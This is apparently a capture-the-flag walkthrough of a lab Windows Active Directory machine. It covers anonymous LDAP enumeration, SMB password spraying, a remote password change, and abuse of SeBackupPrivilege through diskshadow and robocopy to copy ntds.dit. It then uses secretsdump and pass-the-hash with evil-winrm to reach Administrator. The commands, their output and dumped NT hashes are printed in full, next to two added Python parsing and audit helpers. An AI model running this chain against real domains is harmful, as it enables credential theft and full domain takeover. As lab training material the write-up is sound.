Vulnlab Baby Walkthrough by Yunolay (LDAP Enumeration, SMB Password Spraying, Privilege escalation using SeBackupPrivilege and SeRestorePrivilege)


Overview

Active Directory Pentesting

  • Baby (Solo, Windows)
    • Junior Level Windows Active Directory Machine
    • You will learn about LDAP-Enumeration & Windows Privileges

User

Look into anonymous LDAP Access.

Root

Look at user privileges.

Nmap Scan

I first ran a normal nmap scan, but most of the services came back as tcpwrapped.

$ nmap -sT -sCV -p- -Pn --min-rate 5000 10.10.88.63
...
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 10:44 EDT
Nmap scan report for 10.10.88.63
Host is up (0.24s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
593/tcp open tcpwrapped
3389/tcp open tcpwrapped
|_ssl-date: 2023-10-23T11:30:03+00:00; -3h15m47s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2023-07-29T07:48:30
|_Not valid after: 2024-01-28T07:48:30
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-23T11:29:20+00:00
49664/tcp open tcpwrapped
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -3h15m49s, deviation: 2s, median: -3h15m51s
| smb2-time:
| date: 2023-10-23T11:29:22
|_ start_date: N/A
...

I then tried a slower scan (-T2 with limited parallelism) to get past the tcpwrapped results. It worked, the real service names appeared, and the results were what I needed.

$ nmap -n -vv -A --min-parallelism=50 --max-parallelism=150 -Pn -T2 10.10.88.63
...
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-10-23 11:33:49Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2023-10-23T11:34:51+00:00; -3h15m18s from scanner time.
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-23T11:34:06+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-29T07:48:30
| Not valid after: 2024-01-28T07:48:30
| MD5: 78d3:c88b:3a9a:ed6c:5130:b9de:3806:8c4d
| SHA-1: a58c:9299:bb68:7192:5f48:8c6e:4022:1426:3a56:6006
5357/tcp open tcpwrapped syn-ack
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-23T11:34:10
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62673/tcp): CLEAN (Timeout)
| Check 2 (port 49254/tcp): CLEAN (Timeout)
| Check 3 (port 63888/udp): CLEAN (Timeout)
| Check 4 (port 45646/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -3h15m20s, deviation: 2s, median: -3h15m22s
...

From the scan I found the domain name baby.vl and the NetBIOS computer name BABYDC.

LDAP Enumeration

Next I used ldapsearch with an anonymous bind (-x and no credentials) to enumerate LDAP.

$ ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*"
...
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20211121151437.0Z
displayName: Teresa Bell
uSNCreated: 12889
memberOf: CN=it,CN=Users,DC=baby,DC=vl
uSNChanged: 12905
name: Teresa Bell
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
userAccountControl: 66080
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132819812778759642
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAf1veU67Ze+7mkhtWWgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Teresa.Bell
sAMAccountType: 805306368
userPrincipalName: Teresa.Bell@baby.vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dSCorePropagationData: 20211121163014.0Z
dSCorePropagationData: 20211121162927.0Z
dSCorePropagationData: 16010101000416.0Z
msDS-SupportedEncryptionTypes: 0
...

Looking at the results, I found that Teresa.Bell’s description field states her initial password: “BabyStart123!”.
I then extracted all users from the userPrincipalName attribute, removed the entries I did not need, and kept the names in first.last form.

$ ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*" | grep userPrincipalName | cut -d " " -f 2 | cut -d "@" -f 1
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell

Save this result as users.txt.

SMB Password Spraying

I tried a password spray with this list, but none of the logins succeeded.

$ crackmapexec smb 10.10.88.63 -u users.txt -p "BabyStart123\!"
SMB 10.10.88.63 445 BABYDC [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE

When I went back to the ldapsearch output, I noticed that my user list was incomplete: some user objects have no userPrincipalName attribute, so grepping for it had missed them.

$ ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*" | grep "#"
...
# Administrator, Users, baby.vl
# Guest, Users, baby.vl
# krbtgt, Users, baby.vl
# Domain Computers, Users, baby.vl
# Domain Controllers, Users, baby.vl
# Schema Admins, Users, baby.vl
# Enterprise Admins, Users, baby.vl
# Cert Publishers, Users, baby.vl
# Domain Admins, Users, baby.vl
# Domain Users, Users, baby.vl
# Domain Guests, Users, baby.vl
# Group Policy Creator Owners, Users, baby.vl
# RAS and IAS Servers, Users, baby.vl
# Allowed RODC Password Replication Group, Users, baby.vl
# Denied RODC Password Replication Group, Users, baby.vl
# Read-only Domain Controllers, Users, baby.vl
# Enterprise Read-only Domain Controllers, Users, baby.vl
# Cloneable Domain Controllers, Users, baby.vl
# Protected Users, Users, baby.vl
# Key Admins, Users, baby.vl
# Enterprise Key Admins, Users, baby.vl
# DnsAdmins, Users, baby.vl
# DnsUpdateProxy, Users, baby.vl
# dev, Users, baby.vl
# Jacqueline Barnett, dev, baby.vl
# Ashley Webb, dev, baby.vl
# Hugh George, dev, baby.vl
# Leonard Dyer, dev, baby.vl
# Ian Walker, dev, baby.vl
# it, Users, baby.vl
# Connor Wilkinson, it, baby.vl
# Caroline Robinson, it, baby.vl
# Joseph Hughes, it, baby.vl
# Kerry Wilson, it, baby.vl
# Teresa Bell, it, baby.vl
...

I recreated the user list from the entry comment lines instead, deleted the groups and other entries that are not user accounts, and saved it again as users.txt.

$ ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*" | grep "#" | grep -oE '\b\w+\s\w+\b' | sed 's/ /./g'
...
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
Connor.Wilkinson
Caroline.Robinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
...
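A small parser for ldapsearch (LDIF) output, added here as an example and not the author's code: it builds the user list from objectClass and sAMAccountName, so accounts without a userPrincipalName (the pitfall above, such as Caroline Robinson) are not dropped, and it includes a defensive audit of the description attribute, the same field that leaked Teresa Bell's initial password. The LDIF sample inside is constructed from the page's output.

```python
# Added example for this walkthrough (not the author's code): parse ldapsearch
# LDIF output and build the user list from objectClass + sAMAccountName, so
# accounts without a userPrincipalName (the pitfall above) are not missed.
import base64

# Constructed LDIF modelled on the page's output: a user with a UPN, a user
# without one, and a group that must be excluded from the user list.
SAMPLE_LDIF = """\
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: user
description: Set initial password to BabyStart123!
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
sAMAccountName: Teresa.Bell
userPrincipalName: Teresa.Bell@baby.vl

dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
objectClass: user
sAMAccountName: Caroline.Robinson

dn: CN=it,CN=Users,DC=baby,DC=vl
objectClass: group
sAMAccountName: it
"""


def parse_ldif(text):
    """Return entries as dicts attr -> [values]. Decodes '::' base64 values
    (kept as hex) and joins LDIF continuation lines (leading space)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, cur = [], {}
    for line in lines + [""]:              # sentinel flushes the last entry
        if not line.strip():
            if cur:
                entries.append(cur)
                cur = {}
            continue
        if line.startswith("#") or ":" not in line:
            continue                        # ldapsearch comment or junk line
        attr, _, val = line.partition(":")
        if val.startswith(":"):             # 'attr:: base64value'
            val = base64.b64decode(val[1:].strip()).hex()
        cur.setdefault(attr, []).append(val.strip())
    return entries


def user_accounts(entries):
    """sAMAccountName of user objects, excluding groups and computer accounts."""
    names = []
    for e in entries:
        classes = {c.lower() for c in e.get("objectClass", [])}
        if "user" in classes and "computer" not in classes:
            names += e.get("sAMAccountName", [])
    return names


def password_in_description(entries):
    """Audit check: accounts whose description field mentions a password."""
    return {e["sAMAccountName"][0]: d for e in entries
            for d in e.get("description", []) if "password" in d.lower()}
```

Feed it the real ldapsearch output with `parse_ldif(open("dump.ldif").read())`; running the description check over a production directory is a cheap way to find the kind of leak this box is built around.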

I used crackmapexec again to password spray.

$ crackmapexec smb 10.10.88.63 -u users.txt -p "BabyStart123\!"
SMB 10.10.88.63 445 BABYDC [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE

This time the spray showed that the account “Caroline.Robinson” returns STATUS_PASSWORD_MUST_CHANGE: the password is correct, but it must be changed at next logon.
There are known ways to change such a password remotely, for example with smbpasswd.

I changed Caroline.Robinson’s password remotely. It worked fine.

$ smbpasswd -r 10.10.88.63 -U "Caroline.Robinson"
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson

User – Caroline.Robinson

I obtained a remote shell by logging in as Caroline.Robinson with the changed password using evil-winrm.

It worked and there was a User Flag on Caroline.Robinson’s Desktop.

$ evil-winrm -i 10.10.88.63 -u Caroline.Robinson -p Password1

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> type C:\Users\Caroline.Robinson\Desktop\user.txt
VL{<REDACTED>}

Privilege Escalation – Administrator

Check the privileges granted to Caroline.Robinson using the “whoami /priv” command.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Caroline.Robinson had both SeBackupPrivilege and SeRestorePrivilege enabled.

SeBackupPrivilege lets a process read any file regardless of its ACL, so it is well known that with it you can save the SAM and SYSTEM registry hives and extract NT hashes from them.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save hklm\sam sam
The operation completed successfully.

evil-winrm has a download function, so retrieving the two hives was easy. I then used impacket-secretsdump to dump the Administrator’s NT hash from them.

$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

I tried to log in as Administrator with evil-winrm using pass-the-hash with the dumped hash. However, this failed.

$ evil-winrm -i 10.10.88.63 -u Administrator -H 8d992faed38128ae85e95fa35868bb43

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code

This is actually the local Administrator hash from the SAM, which is not used for logons on a domain controller. Instead, we need the hashes of the domain accounts, and those are stored in “ntds.dit”, so we also need to obtain that file.

I created a diskshadow script file (.dsh) containing the commands that diskshadow will run: create a persistent shadow copy of C: and expose it as a new drive letter.

$ cat kunal.dsh
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:

$ unix2dos kunal.dsh
unix2dos: converting file kunal.dsh to DOS format...

Then I uploaded the file with evil-winrm’s upload function and ran diskshadow with it to create a shadow copy of the C: drive, exposed as the new drive Z:.

*Evil-WinRM* PS C:\Temp> upload kunal.dsh
                                        
Info: Uploading /home/kali/vulnlab/Baby/kunal.dsh to C:\Temp\kunal.dsh
                                        
Data: 112 bytes of 112 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> diskshadow /s kunal.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  10/23/2023 3:11:30 PM


-> set context persistent nowriters
-> add volume c: alias kunal
-> create
Alias kunal for shadow ID {69873b2c-c8cc-47c4-87f6-530b086b0eed} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {825b3882-58fd-45ec-82b4-d41c20790e90} set as environment variable.


Querying all shadow copies with the shadow copy set ID {825b3882-58fd-45ec-82b4-d41c20790e90}


* Shadow copy ID = {69873b2c-c8cc-47c4-87f6-530b086b0eed} %kunal%
- Shadow copy set: {825b3882-58fd-45ec-82b4-d41c20790e90} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 10/23/2023 3:11:30 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes:  No_Auto_Release Persistent No_Writers Differential


Number of shadow copies listed: 1
-> expose %kunal% z:
-> %kunal% = {69873b2c-c8cc-47c4-87f6-530b086b0eed}
The shadow copy was successfully exposed as z:\.

diskshadow successfully created a shadow copy of C: and exposed it as Z:. Because ntds.dit is locked on the live system, the copy is taken from the shadow volume, and robocopy /B (backup mode) uses SeBackupPrivilege to read it.

*Evil-WinRM* PS C:\Temp> robocopy /B Z:\Windows\NTDS . ntds.dit


-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------


  Started : Monday, October 23, 2023 3:16:12 PM
   Source : Z:\Windows\NTDS\
     Dest : C:\Temp\


    Files : ntds.dit


  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30


------------------------------------------------------------------------------


                   1 Z:\Windows\NTDS\
    New File    16.0 m ntds.dit
 
...


------------------------------------------------------------------------------


               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00




   Speed :           111,107,390 Bytes/sec.
   Speed :             6,357.616 MegaBytes/min.
   Ended : Monday, October 23, 2023 3:16:12 PM

The copy of ntds.dit now exists in C:\Temp.

*Evil-WinRM* PS C:\Temp> dir ntds.dit


Directory: C:\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/23/2023 10:52 AM 16777216 ntds.dit

Download ntds.dit.

*Evil-WinRM* PS C:\Temp> download ntds.dit

Info: Downloading C:\Temp\ntds.dit to ntds.dit

Info: Download successful!

Alternatively, hosting a share with impacket-smbserver and copying the file to it from the target is also a good option for transferring a file of this size.

$ impacket-smbserver -smb2support control `pwd`
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

I ran secretsdump again, this time with ntds.dit as well, to get the domain Administrator’s NT hash.

$ impacket-secretsdump -sam sam -system system -ntds ntds.dit local
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:e1423e874f45e8b7a8627f4475e0e9d9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
...
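To make the local-versus-domain distinction explicit, here is an added example (not the author's code and not part of Impacket) that parses secretsdump output into its SAM and NTDS sections, returns the hash that actually belongs to the domain account, and runs two defensive checks: empty-password NT hashes, and a SAM entry (on a domain controller this is the DSRM account) that shares its password with the domain account of the same name. The sample output is constructed from the hashes shown above.

```python
# Added example (not the author's or Impacket's code): split secretsdump output
# into its SAM and NTDS sections so the local Administrator hash (SAM) is not
# confused with the domain Administrator hash (ntds.dit), and run two checks.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed sample assembled from the hashes shown in the page's secretsdump run.
SAMPLE_OUTPUT = """\
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:e1423e874f45e8b7a8627f4475e0e9d9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Map 'sam' / 'ntds' -> {account: (rid, lmhash, nthash)}."""
    sections, current = {"sam": {}, "ntds": {}}, None
    for line in text.splitlines():
        if "Dumping local SAM hashes" in line:
            current = "sam"
        elif "Dumping Domain Credentials" in line:
            current = "ntds"
        elif current and not line.startswith("["):   # skip [*]/[-] status lines
            parts = line.split(":")
            if len(parts) >= 4 and parts[1].isdigit():
                user, rid, lm, nt = parts[0], int(parts[1]), parts[2], parts[3]
                sections[current][user] = (rid, lm.lower(), nt.lower())
    return sections


def domain_hash(sections, account="Administrator"):
    """NT hash that belongs to the domain account (from ntds.dit), never the SAM one."""
    entry = sections["ntds"].get(account)
    return entry[2] if entry else None


def audit(sections):
    """Defensive checks: empty-password NT hashes, and a SAM entry (on a DC this
    is the DSRM account) whose password equals the domain account's password."""
    findings = []
    for sec, accounts in sections.items():
        for user, (_rid, _lm, nt) in accounts.items():
            if nt == EMPTY_NT:
                findings.append(f"{sec}:{user} has the empty-password NT hash")
    for user, (_rid, _lm, nt) in sections["sam"].items():
        dom = sections["ntds"].get(user)
        if dom and dom[2] == nt and nt != EMPTY_NT:
            findings.append(f"{user}: DSRM/local password reused as domain password")
    return findings
```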

I established a shell with evil-winrm using the dumped hash of the domain account. This time it worked.

$ evil-winrm -i 10.10.88.63 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

I got the root flag.

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
VL{<REDACTED>}

Thoughts

I had the mistaken belief that with SeBackupPrivilege and SeRestorePrivilege I could dump the domain Administrator’s NT hash just by saving SAM and SYSTEM. Saving ntds.dit as well made me realise that the hashes of domain accounts live there, not in the SAM, and that the SAM hash only belongs to the local account. I learned a lot from it.

Getting stuck on this step is exactly why the lesson stayed with me.
